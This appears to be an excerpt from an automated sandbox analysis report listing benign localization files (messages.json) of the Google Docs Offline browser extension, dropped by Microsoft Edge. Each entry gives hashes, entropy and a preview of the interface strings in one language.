SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
